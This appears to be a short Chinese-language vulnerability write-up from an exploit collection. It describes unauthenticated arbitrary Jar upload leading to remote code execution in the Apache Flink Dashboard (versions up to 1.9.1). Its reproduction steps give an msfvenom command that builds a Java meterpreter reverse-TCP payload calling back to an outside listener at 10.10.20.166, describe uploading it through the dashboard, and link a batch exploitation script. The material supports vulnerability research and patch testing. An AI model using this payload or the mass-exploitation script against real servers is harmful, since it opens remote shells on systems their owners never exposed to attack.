Apache Flink Dashboard 未授权访问-远程代码命令执行.md
991 B / 2021-07-15 19:47:58
Apache Flink Dashboard 未授权访问-远程代码命令执行
==================================================
一、漏洞简介
------------
Apache Flink的任意Jar包上传导致远程代码执行的漏洞
二、漏洞影响
------------
\<= 1.9.1(最新版本)
三、复现过程
------------
### 1、
msfvenom -p java/meterpreter/reverse_tcp LHOST=10.10.20.166 LPORT=8989 -f jar > rce.jar
![](./resource/ApacheFlinkDashboard未授权访问-远程代码命令执行/media/rId25.png)
### 2、
上传alewong Jar包
![](./resource/ApacheFlinkDashboard未授权访问-远程代码命令执行/media/rId27.png)
![](./resource/ApacheFlinkDashboard未授权访问-远程代码命令执行/media/rId28.png)
### 批量脚本
https://github.com/ianxtianxt/Apache-Flink-Dashboard-rec
Ps:
当注释掉 if 'Unable to load requested file' in str(data):
之后,出现Token为空,或者 Unauthorized request 时候是不存在未授权访问的,而是带授权